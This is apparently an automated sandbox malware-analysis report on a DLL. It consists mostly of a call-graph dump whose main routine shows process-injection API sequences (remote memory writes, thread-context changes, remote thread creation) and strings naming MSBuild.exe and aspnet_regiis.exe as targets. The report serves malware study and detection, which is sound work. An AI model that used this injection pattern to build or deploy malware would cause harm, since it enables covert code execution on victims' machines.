11044->11041 10472 6cdc4803 10480 6cdc62c3 10472->10480 10475 6cdc4817 10476 6cdc474e _free 14 API calls 10477 6cdc481f 10476->10477 10478 6cdc482c 10477->10478 10479 6cdc482f __DllMainCRTStartup@12 6 API calls 10477->10479 10479->10475 10481 6cdc61e1 _free 5 API calls 10480->10481 10482 6cdc62df 10481->10482 10483 6cdc62f7 TlsAlloc 10482->10483 10484 6cdc480d 10482->10484 10483->10484 10484->10475 10484->10476 10129 6cdc64fc GetProcessHeap 10384 6cdc98bf 10387 6cdc98c8 10384->10387 10385 6cdc98ef 10388 6cdca54e 10385->10388 10391 6cdca657 20 API calls 10385->10391 10386 6cdc9930 10386->10388 10393 6cdca657 10386->10393 10387->10385 10387->10386 10392 6cdca57e 10391->10392 10394 6cdca660 10393->10394 10397 6cdcab73 10394->10397 10398 6cdcabb2 __startOneArgErrorHandling 10397->10398 10402 6cdcac34 __startOneArgErrorHandling 10398->10402 10405 6cdcaf7e 10398->10405 10400 6cdcb297 __startOneArgErrorHandling 14 API calls 10401 6cdcac69 10400->10401 10403 6cdc1740 _ValidateLocalCookies 5 API calls 10401->10403 10402->10400 10402->10401 10404 6cdc997e 10403->10404 10406 6cdcafa1 __raise_exc RaiseException 10405->10406 10407 6cdcaf9c 10406->10407 10407->10402 10130 6cdc6ef8 10131 6cdc6e27 ___scrt_uninitialize_crt 66 API calls 10130->10131 10132 6cdc6f00 10131->10132 10140 6cdc8f06 10132->10140 10134 6cdc6f05 10150 6cdc8fb1 10134->10150 10137 6cdc6f2f 10138 6cdc4bf3 _free 14 API calls 10137->10138 10139 6cdc6f3a 10138->10139 10141 6cdc8f12 ___scrt_is_nonwritable_in_current_image 10140->10141 10154 6cdc488a EnterCriticalSection 10141->10154 10143 6cdc8f89 10168 6cdc8fa8 10143->10168 10145 6cdc8f1d 10145->10143 10147 6cdc8f5d DeleteCriticalSection 10145->10147 10155 6cdc963b 10145->10155 10148 6cdc4bf3 _free 14 API calls 10147->10148 10148->10145 10151 6cdc6f14 DeleteCriticalSection 10150->10151 10152 6cdc8fc8 10150->10152 10151->10134 10151->10137 10152->10151 10153 6cdc4bf3 _free 14 API calls 10152->10153 10153->10151 10154->10145 10156 6cdc9647 ___scrt_is_nonwritable_in_current_image 10155->10156 10157 6cdc9651 10156->10157 10159 6cdc9666 10156->10159 10158 6cdc4b83 _free 14 API calls 10157->10158 10160 6cdc9656 10158->10160 10164 6cdc9661 10159->10164 10171 6cdc6f44 EnterCriticalSection 10159->10171 10162 6cdc4ac6 __fassign 25 API calls 10160->10162 10162->10164 10163 6cdc9683 10172 6cdc95c4 10163->10172 10164->10145 10166 6cdc968e 10188 6cdc96b5 10166->10188 10268 6cdc48d2 LeaveCriticalSection 10168->10268 10170 6cdc8f95 10170->10134 10171->10163 10173 6cdc95d1 10172->10173 10175 6cdc95e6 10172->10175 10174 6cdc4b83 _free 14 API calls 10173->10174 10176 6cdc95d6 10174->10176 10177 6cdc6d7a ___scrt_uninitialize_crt 62 API calls 10175->10177 10180 6cdc95e1 10175->10180 10178 6cdc4ac6 __fassign 25 API calls 10176->10178 10179 6cdc95fb 10177->10179 10178->10180 10181 6cdc8fb1 14 API calls 10179->10181 10180->10166 10182 6cdc9603 10181->10182 10183 6cdc7170 ___scrt_uninitialize_crt 25 API calls 10182->10183 10184 6cdc9609 10183->10184 10191 6cdc9c37 10184->10191 10187 6cdc4bf3 _free 14 API calls 10187->10180 10267 6cdc6f58 LeaveCriticalSection 10188->10267 10190 6cdc96bd 10190->10164 10192 6cdc9c48 10191->10192 10197 6cdc9c5d 10191->10197 10206 6cdc4b70 10192->10206 10194 6cdc9ca6 10195 6cdc4b70 __dosmaperr 14 API calls 10194->10195 10198 6cdc9cab 10195->10198 10197->10194 10200 6cdc9c84 10197->10200 10201 6cdc4b83 _free 14 API calls 10198->10201 10199 6cdc4b83 _free 14 API calls 10203 6cdc960f 10199->10203 10209 6cdc9bab 10200->10209 10204 6cdc9cb3 10201->10204 10203->10180 10203->10187 10205 6cdc4ac6 __fassign 25 API calls 10204->10205 10205->10203 10207 6cdc474e _free 14 API calls 10206->10207 10208 6cdc4b75 10207->10208 10208->10199 10210 6cdc9bb7 ___scrt_is_nonwritable_in_current_image 10209->10210 10220 6cdc825f EnterCriticalSection 10210->10220 10212 6cdc9bc5 10213 6cdc9bec 10212->10213 10214 6cdc9bf7 10212->10214 10221 6cdc9cc4 10213->10221 10216 6cdc4b83 _free 14 API calls 10214->10216 10217 6cdc9bf2 10216->10217 10236 6cdc9c2b 10217->10236 10220->10212 10239 6cdc8336 10221->10239 10223 6cdc9cda 10252 6cdc82a5 10223->10252 10225 6cdc9cd4 10225->10223 10226 6cdc9d0c 10225->10226 10229 6cdc8336 ___scrt_uninitialize_crt 25 API calls 10225->10229 10226->10223 10227 6cdc8336 ___scrt_uninitialize_crt 25 API calls 10226->10227 10231 6cdc9d18 CloseHandle 10227->10231 10230 6cdc9d03 10229->10230 10233 6cdc8336 ___scrt_uninitialize_crt 25 API calls 10230->10233 10231->10223 10234 6cdc9d24 GetLastError 10231->10234 10232 6cdc9d54 10232->10217 10233->10226 10234->10223 10266 6cdc8282 LeaveCriticalSection 10236->10266 10238 6cdc9c14 10238->10203 10240 6cdc8358 10239->10240 10241 6cdc8343 10239->10241 10243 6cdc4b70 __dosmaperr 14 API calls 10240->10243 10245 6cdc837d 10240->10245 10242 6cdc4b70 __dosmaperr 14 API calls 10241->10242 10244 6cdc8348 10242->10244 10246 6cdc8388 10243->10246 10247 6cdc4b83 _free 14 API calls 10244->10247 10245->10225 10248 6cdc4b83 _free 14 API calls 10246->10248 10249 6cdc8350 10247->10249 10250 6cdc8390 10248->10250 10249->10225 10251 6cdc4ac6 __fassign 25 API calls 10250->10251 10251->10249 10253 6cdc831b 10252->10253 10254 6cdc82b4 10252->10254 10255 6cdc4b83 _free 14 API calls 10253->10255 10254->10253 10259 6cdc82de 10254->10259 10256 6cdc8320 10255->10256 10257 6cdc4b70 __dosmaperr 14 API calls 10256->10257 10258 6cdc830b 10257->10258 10258->10232 10261 6cdc4b4d 10258->10261 10259->10258 10260 6cdc8305 SetStdHandle 10259->10260 10260->10258 10262 6cdc4b70 __dosmaperr 14 API calls 10261->10262 10263 6cdc4b58 _free 10262->10263 10264 6cdc4b83 _free 14 API calls 10263->10264 10265 6cdc4b6b 10264->10265 10265->10232 10266->10238 10267->10190 10268->10170 11045 6cdc79b9 11048 6cdc764e 11045->11048 11046 6cdc1740 _ValidateLocalCookies 5 API calls 11047 6cdc765b 11046->11047 11048->11046 9868 6cdb87f0 9880 6cdb8847 __DllMainCRTStartup@12 9868->9880 9869 6cdb6750 9 API calls 9869->9880 9870 6cdbb983 NtGetContextThread 9870->9880 9871 6cdbf7bf VirtualAlloc 9871->9880 9873 6cdbe410 NtWriteVirtualMemory 9873->9880 9874 6cdc087f CloseHandle 9874->9880 9875 6cdbf068 NtSetContextThread NtResumeThread 9875->9880 9876 6cdc085b CloseHandle 9876->9880 9877 6cdbbf10 NtWriteVirtualMemory 9877->9880 9878 6cdbac4a GetConsoleWindow ShowWindow 9909 6cdb1530 9878->9909 9880->9869 9880->9870 9880->9871 9880->9873 9880->9874 9880->9875 9880->9876 9880->9877 9880->9878 9881 6cdb1530 27 API calls 9880->9881 9882 6cdbf33e CloseHandle 9880->9882 9883 6cdbb8b5 CreateProcessW 9880->9883 9884 6cdc0344 NtGetContextThread 9880->9884 9885 6cdbed4c NtCreateThreadEx 9880->9885 9886 6cdbf25b CloseHandle 9880->9886 9887 6cdbbe6f NtAllocateVirtualMemory 9880->9887 9888 6cdbcd9f NtWriteVirtualMemory 9880->9888 9890 6cdbbddc NtAllocateVirtualMemory 9880->9890 9891 6cdc08e4 VirtualAlloc 9880->9891 9892 6cdbe296 NtReadVirtualMemory 9880->9892 9893 6cdbe8fc NtWriteVirtualMemory 9880->9893 9894 6cdc00dc NtWriteVirtualMemory 9880->9894 9895 6cdbf9ed NtWriteVirtualMemory 9880->9895 9896 6cdc06f1 NtCreateThreadEx 9880->9896 9897 6cdbfce0 NtWriteVirtualMemory 9880->9897 9900 6cdbf564 9880->9900 9903 6cdbb260 VirtualAlloc 9880->9903 9904 6cdc07ee NtSetContextThread NtResumeThread 9880->9904 9905 6cdc063a NtWriteVirtualMemory 9880->9905 9906 6cdbc4da NtWriteVirtualMemory 9880->9906 9907 6cdc043d NtWriteVirtualMemory 9880->9907 9942 6cdb1000 9880->9942 9881->9880 9882->9880 9883->9880 9884->9880 9885->9880 9886->9880 9887->9880 9938 6cdb8290 9888->9938 9890->9880 9891->9880 9892->9880 9893->9880 9894->9880 9895->9880 9896->9880 9898 6cdb8290 5 API calls 9897->9898 9899 6cdbfd46 9898->9899 9899->9880 9901 6cdc1740 _ValidateLocalCookies 5 API calls 9900->9901 9902 6cdbf56e 9901->9902 9903->9880 9904->9880 9905->9880 9906->9880 9908 6cdb8290 5 API calls 9907->9908 9908->9899 9918 6cdb1598 ___scrt_uninitialize_crt 9909->9918 9910 6cdb3472 MapViewOfFile 9910->9918 9911 6cdb3dba VirtualProtect 9911->9918 9912 6cdb2cc2 CreateFileMappingA 9912->9918 9913 6cdb2818 GetModuleFileNameA CreateFileA 9913->9918 9914 6cdb4bae K32GetModuleInformation 9914->9918 9915 6cdb4a63 VirtualProtect 9915->9918 9916 6cdb33cf CloseHandle 9916->9918 9917 6cdb48f3 CreateFileMappingA 9917->9918 9918->9910 9918->9911 9918->9912 9918->9913 9918->9914 9918->9915 9918->9916 9918->9917 9919 6cdb4b04 ___scrt_uninitialize_crt 9918->9919 9920 6cdb4540 9918->9920 9924 6cdb2745 K32GetModuleInformation 9918->9924 9925 6cdb410b VirtualProtect 9918->9925 9926 6cdb451d CloseHandle 9918->9926 9927 6cdb44d7 CloseHandle 9918->9927 9928 6cdb45e6 K32GetModuleInformation 9918->9928 9929 6cdb44fa CloseHandle 9918->9929 9930 6cdb4843 GetCurrentProcess 9918->9930 9933 6cdb4981 CloseHandle 9918->9933 9934 6cdb25c7 GetCurrentProcess 9918->9934 9937 6cdb468e CreateFileMappingA 9918->9937 9921 6cdb4b20 VirtualProtect 9919->9921 9922 6cdc1740 _ValidateLocalCookies 5 API calls 9920->9922 9921->9918 9923 6cdb454a 9922->9923 9923->9880 9924->9918 9925->9918 9926->9918 9927->9918 9928->9918 9929->9918 9931 6cdc2370 __DllMainCRTStartup@12 9930->9931 9932 6cdb4884 GetModuleHandleA 9931->9932 9932->9918 9933->9918 9946 6cdc2370 9934->9946 9937->9918 9939 6cdb82e6 9938->9939 9940 6cdc1740 _ValidateLocalCookies 5 API calls 9939->9940 9941 6cdb87ac 9940->9941 9941->9880 9945 6cdb1057 9942->9945 9943 6cdc1740 _ValidateLocalCookies 5 API calls 9944 6cdb14e9 9943->9944 9944->9880 9945->9943 9947 6cdb2620 GetModuleHandleA 9946->9947 9947->9918 9948 6cdc6e30 9949 6cdc6e3d 9948->9949 9950 6cdc4b96 _free 14 API calls 9949->9950 9951 6cdc6e57 9950->9951 9952 6cdc4bf3 _free 14 API calls 9951->9952 9953 6cdc6e63 9952->9953 9954 6cdc4b96 _free 14 API calls 9953->9954 9958 6cdc6e89 9953->9958 9955 6cdc6e7d 9954->9955 9957 6cdc4bf3 _free 14 API calls 9955->9957 9957->9958 9959 6cdc6e95 9958->9959 9960 6cdc63c2 9958->9960 9961 6cdc61e1 _free 5 API calls 9960->9961 9962 6cdc63de 9961->9962 9963 6cdc63fc InitializeCriticalSectionAndSpinCount 9962->9963 9964 6cdc63e7 9962->9964 9963->9964 9964->9958 10874 6cdc7bf0 10877 6cdc7c07 10874->10877 10876 6cdc7c02 10878 6cdc7c29 10877->10878 10879 6cdc7c15 10877->10879 10880 6cdc7c31 10878->10880 10881 6cdc7c43 10878->10881 10882 6cdc4b83 _free 14 API calls 10879->10882 10883 6cdc4b83 _free 14 API calls 10880->10883 10886 6cdc411d __fassign 37 API calls 10881->10886 10890 6cdc7c41 10881->10890 10884 6cdc7c1a 10882->10884 10885 6cdc7c36 10883->10885 10887 6cdc4ac6 __fassign 25 API calls 10884->10887 10889 6cdc4ac6 __fassign 25 API calls 10885->10889 10886->10890 10888 6cdc7c25 10887->10888 10888->10876 10889->10890 10890->10876 11049 6cdc9db0 11052 6cdc9dce 11049->11052 11051 6cdc9dc6 11056 6cdc9dd3 11052->11056 11053 6cdca693 15 API calls 11055 6cdc9fff 11053->11055 11054 6cdc9e68 11054->11051 11055->11051 11056->11053 11056->11054 10427 6cdc9871 10428 6cdc9891 10427->10428 10431 6cdc98c8 10428->10431 10430 6cdc98bb 10432 6cdc98cf 10431->10432 10433 6cdc9930 10432->10433 10434 6cdc98ef 10432->10434 10435 6cdca657 20 API calls 10433->10435 10436 6cdca54e 10433->10436 10434->10436 10438 6cdca657 20 API calls 10434->10438 10437 6cdc997e 10435->10437 10436->10430 10437->10430 10439 6cdca57e 10438->10439 10439->10430 11077 6cdc3b2d 11078 6cdc5b1a 47 API calls 11077->11078 11079 6cdc3b3f 11078->11079 11088 6cdc5fdb GetEnvironmentStringsW 11079->11088 11083 6cdc4bf3 _free 14 API calls 11084 6cdc3b79 11083->11084 11086 6cdc4bf3 _free 14 API calls 11087 6cdc3b4a 11086->11087 11087->11083 11089 6cdc6048 11088->11089 11090 6cdc5ff2 11088->11090 11091 6cdc3b44 11089->11091 11092 6cdc6051 FreeEnvironmentStringsW 11089->11092 11093 6cdc5eed ___scrt_uninitialize_crt WideCharToMultiByte 11090->11093 11091->11087 11100 6cdc3b7f 11091->11100 11092->11091 11094 6cdc600b 11093->11094 11094->11089 11095 6cdc6f6c 15 API calls 11094->11095 11096 6cdc601b 11095->11096 11097 6cdc6033 11096->11097 11098 6cdc5eed ___scrt_uninitialize_crt WideCharToMultiByte 11096->11098 11099 6cdc4bf3 _free 14 API calls 11097->11099 11098->11097 11099->11089 11101 6cdc3b94 11100->11101 11102 6cdc4b96 _free 14 API calls 11101->11102 11107 6cdc3bbb 11102->11107 11103 6cdc3c20 11104 6cdc4bf3 _free 14 API calls 11103->11104 11105 6cdc3b55 11104->11105 11105->11086 11106 6cdc4b96 _free 14 API calls 11106->11107 11107->11103 11107->11106 11108 6cdc3c22 11107->11108 11113 6cdc3c42 11107->11113 11115 6cdc4bf3 _free 14 API calls 11107->11115 11117 6cdc407f 11107->11117 11109 6cdc3c4f 14 API calls 11108->11109 11111 6cdc3c28 11109->11111 11112 6cdc4bf3 _free 14 API calls 11111->11112 11112->11103 11114 6cdc4ad6 __fassign 11 API calls 11113->11114 11116 6cdc3c4e 11114->11116 11115->11107 11118 6cdc408c 11117->11118 11119 6cdc409a 11117->11119 11118->11119 11124 6cdc40b1 11118->11124 11120 6cdc4b83 _free 14 API calls 11119->11120 11121 6cdc40a2 11120->11121 11122 6cdc4ac6 __fassign 25 API calls 11121->11122 11123 6cdc40ac 11122->11123 11123->11107 11124->11123 11125 6cdc4b83 _free 14 API calls 11124->11125 11125->11121 10485 6cdc3828 10486 6cdc383f 10485->10486 10496 6cdc3838 10485->10496 10487 6cdc3860 10486->10487 10488 6cdc384a 10486->10488 10509 6cdc5b1a 10487->10509 10490 6cdc4b83 _free 14 API calls 10488->10490 10492 6cdc384f 10490->10492 10494 6cdc4ac6 __fassign 25 API calls 10492->10494 10494->10496 10501 6cdc38c4 10503 6cdc4b83 _free 14 API calls 10501->10503 10502 6cdc38d0 10504 6cdc395e 37 API calls 10502->10504 10508 6cdc38c9 10503->10508 10506 6cdc38e8 10504->10506 10505 6cdc4bf3 _free 14 API calls 10505->10496 10507 6cdc4bf3 _free 14 API calls 10506->10507 10506->10508 10507->10508 10508->10505 10510 6cdc5b23 10509->10510 10514 6cdc3866 10509->10514 10537 6cdc46b4 10510->10537 10515 6cdc5561 GetModuleFileNameW 10514->10515 10516 6cdc5590 GetLastError 10515->10516 10517 6cdc55a1 10515->10517 10519 6cdc4b4d __dosmaperr 14 API calls 10516->10519 10792 6cdc52da 10517->10792 10521 6cdc559c 10519->10521 10523 6cdc1740 _ValidateLocalCookies 5 API calls 10521->10523 10524 6cdc3879 10523->10524 10525 6cdc395e 10524->10525 10527 6cdc3983 10525->10527 10529 6cdc39e3 10527->10529 10828 6cdc5e40 10527->10828 10528 6cdc38ae 10531 6cdc3ad2 10528->10531 10529->10528 10530 6cdc5e40 37 API calls 10529->10530 10530->10529 10532 6cdc38bb 10531->10532 10533 6cdc3ae3 10531->10533 10532->10501 10532->10502 10533->10532 10534 6cdc4b96 _free 14 API calls 10533->10534 10535 6cdc3b0c 10534->10535 10536 6cdc4bf3 _free 14 API calls 10535->10536 10536->10532 10538 6cdc46bf 10537->10538 10543 6cdc46c5 10537->10543 10539 6cdc6341 _free 6 API calls 10538->10539 10539->10543 10540 6cdc6380 _free 6 API calls 10542 6cdc46df 10540->10542 10541 6cdc46cb 10545 6cdc40d9 __fassign 37 API calls 10541->10545 10550 6cdc4744 10541->10550 10542->10541 10544 6cdc4b96 _free 14 API calls 10542->10544 10543->10540 10543->10541 10546 6cdc46ef 10544->10546 10547 6cdc474d 10545->10547 10548 6cdc470c 10546->10548 10549 6cdc46f7 10546->10549 10552 6cdc6380 _free 6 API calls 10548->10552 10551 6cdc6380 _free 6 API calls 10549->10551 10562 6cdc5966 10550->10562 10553 6cdc4703 10551->10553 10554 6cdc4718 10552->10554 10558 6cdc4bf3 _free 14 API calls 10553->10558 10555 6cdc471c 10554->10555 10556 6cdc472b 10554->10556 10559 6cdc6380 _free 6 API calls 10555->10559 10557 6cdc43f9 _free 14 API calls 10556->10557 10560 6cdc4736 10557->10560 10558->10541 10559->10553 10561 6cdc4bf3 _free 14 API calls 10560->10561 10561->10541 10581 6cdc5a7a 10562->10581 10582 6cdc5a86 ___scrt_is_nonwritable_in_current_image 10581->10582 10583 6cdc5aa0 10582->10583 10625 6cdc488a EnterCriticalSection 10582->10625 10585 6cdc5979 10583->10585 10587 6cdc40d9 __fassign 37 API calls 10583->10587 10592 6cdc5710 10585->10592 10586 6cdc5adc 10626 6cdc5af9 10586->10626 10589 6cdc5b19 10587->10589 10590 6cdc5ab0 10590->10586 10591 6cdc4bf3 _free 14 API calls 10590->10591 10591->10586 10630 6cdc411d 10592->10630 10625->10590 10629 6cdc48d2 LeaveCriticalSection 10626->10629 10628 6cdc5b00 10628->10583 10629->10628 10631 6cdc413d 10630->10631 10632 6cdc45f7 __fassign 37 API calls 10631->10632 10633 6cdc415d 10632->10633 10637 6cdc7116 10633->10637 10638 6cdc7129 10637->10638 10639 6cdc4173 10637->10639 10638->10639 10645 6cdc7524 10638->10645 10641 6cdc7143 10639->10641 10642 6cdc716b 10641->10642 10643 6cdc7156 10641->10643 10643->10642 10663 6cdc5b62 10643->10663 10646 6cdc7530 ___scrt_is_nonwritable_in_current_image 10645->10646 10647 6cdc45f7 __fassign 37 API calls 10646->10647 10648 6cdc7539 10647->10648 10649 6cdc757f 10648->10649 10658 6cdc488a EnterCriticalSection 10648->10658 10649->10639 10651 6cdc7557 10652 6cdc75a5 __fassign 14 API calls 10651->10652 10653 6cdc7568 10652->10653 10659 6cdc7584 10653->10659 10656 6cdc40d9 __fassign 37 API calls 10657 6cdc75a4 10656->10657 10658->10651 10662 6cdc48d2 LeaveCriticalSection 10659->10662 10661 6cdc757b 10661->10649 10661->10656 10662->10661 10664 6cdc45f7 __fassign 37 API calls 10663->10664 10665 6cdc5b6c 10664->10665 10666 6cdc5a7a __fassign 37 API calls 10665->10666 10667 6cdc5b72 10666->10667 10667->10642 10793 6cdc411d __fassign 37 API calls 10792->10793 10794 6cdc52ec 10793->10794 10795 6cdc52fe 10794->10795 10818 6cdc62a4 10794->10818 10797 6cdc545f 10795->10797 10798 6cdc546c 10797->10798 10799 6cdc547b 10797->10799 10798->10521 10800 6cdc54a8 10799->10800 10801 6cdc5483 10799->10801 10802 6cdc5eed ___scrt_uninitialize_crt WideCharToMultiByte 10800->10802 10801->10798 10824 6cdc5526 10801->10824 10804 6cdc54b8 10802->10804 10805 6cdc54bf GetLastError 10804->10805 10806 6cdc54d5 10804->10806 10807 6cdc4b4d __dosmaperr 14 API calls 10805->10807 10808 6cdc54e6 10806->10808 10811 6cdc5526 14 API calls 10806->10811 10810 6cdc54cb 10807->10810 10808->10798 10809 6cdc5eed ___scrt_uninitialize_crt WideCharToMultiByte 10808->10809 10812 6cdc54fe 10809->10812 10813 6cdc4b83 _free 14 API calls 10810->10813 10811->10808 10812->10798 10814 6cdc5505 GetLastError 10812->10814 10813->10798 10815 6cdc4b4d __dosmaperr 14 API calls 10814->10815 10816 6cdc5511 10815->10816 10817 6cdc4b83 _free 14 API calls 10816->10817 10817->10798 10821 6cdc60cc 10818->10821 10822 6cdc61e1 _free 5 API calls 10821->10822 10823 6cdc60e2 10822->10823 10823->10795 10825 6cdc5531 10824->10825 10826 6cdc4b83 _free 14 API calls 10825->10826 10827 6cdc553a 10826->10827 10827->10798 10831 6cdc5de9 10828->10831 10832 6cdc411d __fassign 37 API calls 10831->10832 10833 6cdc5dfd 10832->10833 10833->10527 10891 6cdc7fea 10892 6cdc5b1a 47 API calls 10891->10892 10893 6cdc7fef 10892->10893 11126 6cdc3f24 11127 6cdc4bf3 _free 14 API calls 11126->11127 11128 6cdc3f32 11127->11128 11129 6cdc4bf3 _free 14 API calls 11128->11129 11130 6cdc3f45 11129->11130 11131 6cdc4bf3 _free 14 API calls 11130->11131 11132 6cdc3f56 11131->11132 11133 6cdc4bf3 _free 14 API calls 11132->11133 11134 6cdc3f67 11133->11134 10408 6cdc3ca7 10409 6cdc3cb9 10408->10409 10410 6cdc3cbf 10408->10410 10411 6cdc3c4f 14 API calls 10409->10411 10411->10410 10269 6cdc66e1 10270 6cdc66e6 10269->10270 10272 6cdc6709 10270->10272 10273 6cdc818c 10270->10273 10274 6cdc8199 10273->10274 10278 6cdc81bb 10273->10278 10275 6cdc81b5 10274->10275 10276 6cdc81a7 DeleteCriticalSection 10274->10276 10277 6cdc4bf3 _free 14 API calls 10275->10277 10276->10275 10276->10276 10277->10278 10278->10270 10834 6cdc1a23 ___scrt_dllmain_exception_filter 10894 6cdc4de3 10895 6cdc4df3 10894->10895 10904 6cdc4e07 10894->10904 10896 6cdc4b83 _free 14 API calls 10895->10896 10897 6cdc4df8 10896->10897 10898 6cdc4ac6 __fassign 25 API calls 10897->10898 10900 6cdc4e02 10898->10900 10899 6cdc3ad2 14 API calls 10906 6cdc4ee3 10899->10906 10901 6cdc4e7e 10901->10899 10901->10901 10903 6cdc4eec 10905 6cdc4bf3 _free 14 API calls 10903->10905 10904->10901 10909 6cdc4ef7 10904->10909 10915 6cdc4fd2 10904->10915 10905->10909 10906->10903 10911 6cdc4fc7 10906->10911 10933 6cdc7ba1 10906->10933 10908 6cdc4fb3 10910 6cdc4bf3 _free 14 API calls 10908->10910 10909->10908 10912 6cdc4bf3 _free 14 API calls 10909->10912 10910->10900 10913 6cdc4ad6 __fassign 11 API calls 10911->10913 10912->10909 10914 6cdc4fd1 10913->10914 10916 6cdc4fde 10915->10916 10916->10916 10917 6cdc4b96 _free 14 API calls 10916->10917 10918 6cdc500c 10917->10918 10919 6cdc7ba1 25 API calls 10918->10919 10920 6cdc5038 10919->10920 10921 6cdc4ad6 __fassign 11 API calls 10920->10921 10922 6cdc5082 10921->10922 10923 6cdc52da 37 API calls 10922->10923 10924 6cdc514a 10923->10924 10942 6cdc4dc6 10924->10942 10927 6cdc5198 10928 6cdc52da 37 API calls 10927->10928 10929 6cdc51d5 10928->10929 10945 6cdc4cf7 10929->10945 10932 6cdc4fd2 43 API calls 10936 6cdc7aee 10933->10936 10934 6cdc7b06 10935 6cdc4b83 _free 14 API calls 10934->10935 10937 6cdc7b1a 10934->10937 10941 6cdc7b10 10935->10941 10936->10934 10936->10937 10939 6cdc7b3e 10936->10939 10937->10906 10938 6cdc4ac6 __fassign 25 API calls 10938->10937 10939->10937 10940 6cdc4b83 _free 14 API calls 10939->10940 10940->10941 10941->10938 10968 6cdc4c45 10942->10968 10946 6cdc4d05 10945->10946 10947 6cdc4d21 10945->10947 10948 6cdc5319 14 API calls 10946->10948 10949 6cdc4d48 10947->10949 10950 6cdc4d28 10947->10950 10963 6cdc4d0f 10948->10963 10951 6cdc5eed ___scrt_uninitialize_crt WideCharToMultiByte 10949->10951 10950->10963 10998 6cdc5333 10950->10998 10953 6cdc4d58 10951->10953 10954 6cdc4d5f GetLastError 10953->10954 10955 6cdc4d75 10953->10955 10956 6cdc4b4d __dosmaperr 14 API calls 10954->10956 10957 6cdc4d86 10955->10957 10960 6cdc5333 15 API calls 10955->10960 10959 6cdc4d6b 10956->10959 10958 6cdc5eed ___scrt_uninitialize_crt WideCharToMultiByte 10957->10958 10957->10963 10961 6cdc4d9e 10958->10961 10962 6cdc4b83 _free 14 API calls 10959->10962 10960->10957 10961->10963 10964 6cdc4da5 GetLastError 10961->10964 10962->10963 10963->10932 10965 6cdc4b4d __dosmaperr 14 API calls 10964->10965 10966 6cdc4db1 10965->10966 10967 6cdc4b83 _free 14 API calls 10966->10967 10967->10963 10969 6cdc4c6d 10968->10969 10970 6cdc4c53 10968->10970 10971 6cdc4c74 10969->10971 10972 6cdc4c93 10969->10972 10986 6cdc5319 10970->10986 10985 6cdc4c5d FindFirstFileExW 10971->10985 10990 6cdc536f 10971->10990 10974 6cdc5e71 __fassign MultiByteToWideChar 10972->10974 10976 6cdc4ca2 10974->10976 10977 6cdc4ca9 GetLastError 10976->10977 10979 6cdc4ccf 10976->10979 10980 6cdc536f 15 API calls 10976->10980 10978 6cdc4b4d __dosmaperr 14 API calls 10977->10978 10982 6cdc4cb5 10978->10982 10981 6cdc5e71 __fassign MultiByteToWideChar 10979->10981 10979->10985 10980->10979 10983 6cdc4ce6 10981->10983 10984 6cdc4b83 _free 14 API calls 10982->10984 10983->10977 10983->10985 10984->10985 10985->10927 10987 6cdc5324 10986->10987 10988 6cdc532c 10986->10988 10989 6cdc4bf3 _free 14 API calls 10987->10989 10988->10985 10989->10988 10991 6cdc5319 14 API calls 10990->10991 10992 6cdc537d 10991->10992 10995 6cdc53ae 10992->10995 10996 6cdc6f6c 15 API calls 10995->10996 10997 6cdc538e 10996->10997 10997->10985 10999 6cdc5319 14 API calls 10998->10999 11000 6cdc5341 10999->11000 11001 6cdc53ae 15 API calls 11000->11001 11002 6cdc534f 11001->11002 11002->10963
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2368787578.000000006CDB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDB0000, based on PE: true
                                                • Associated: 00000000.00000002.2368768767.000000006CDB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000000.00000002.2368823957.000000006CDCC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000000.00000002.2368847110.000000006CDD2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000000.00000002.2368912218.000000006CE22000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6cdb0000_Aura.jbxd
                                                Similarity
                                                • API ID: Virtual$Memory$Write$Thread$CloseHandle$AllocContextCreate$AllocateResumeWindow$ConsoleProcessReadShow
                                                • String ID: I`$#N[#$@$@9H$@9H$C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe$D$G/Q$MZx$X$yk$kernel32.dll$ntdll.dll$o<x"$o<x"$}q[$}q[$`\;$wmE$wmE
                                                • API String ID: 1269680361-766751286
                                                • Opcode ID: cfefca03e795d1c00a79a3f7b8a9da2e274a1e8968798a654482c6bc1ad7d6f1
                                                • Instruction ID: 1302b503ad88bfc5aa1db40f669900b46d5dc2fe9e315643b700f5f72532e898
                                                • Opcode Fuzzy Hash: cfefca03e795d1c00a79a3f7b8a9da2e274a1e8968798a654482c6bc1ad7d6f1
                                                • Instruction Fuzzy Hash: 41E311B6B412508FDF088F2CCD947CA77F2AB46350F144699D45AEB7B4C63A9E89CB01
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2368787578.000000006CDB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDB0000, based on PE: true
                                                • Associated: 00000000.00000002.2368768767.000000006CDB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000000.00000002.2368823957.000000006CDCC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000000.00000002.2368847110.000000006CDD2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000000.00000002.2368912218.000000006CE22000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6cdb0000_Aura.jbxd
                                                Similarity
                                                • API ID: Handle$Module$CloseFile$CreateInformationProtectVirtual$CurrentMappingProcess$NameView
                                                • String ID: +sw9$@$gHg1$gHg1$t#$6$6
                                                • API String ID: 3418435400-895042186
                                                • Opcode ID: f20a37381f7c52da87d39a00313cdb0d032d387940622b55e7d25513cce206c8
                                                • Instruction ID: 867e41ab50d218a78bc62e293994c940be3527a555869a36789c0ebb85182f42
                                                • Opcode Fuzzy Hash: f20a37381f7c52da87d39a00313cdb0d032d387940622b55e7d25513cce206c8
                                                • Instruction Fuzzy Hash: E853FEB6B402108FDB14CF3CC9957CA77F2AB86364F108259D856EB7A5C73A9E498F01
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2368787578.000000006CDB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDB0000, based on PE: true
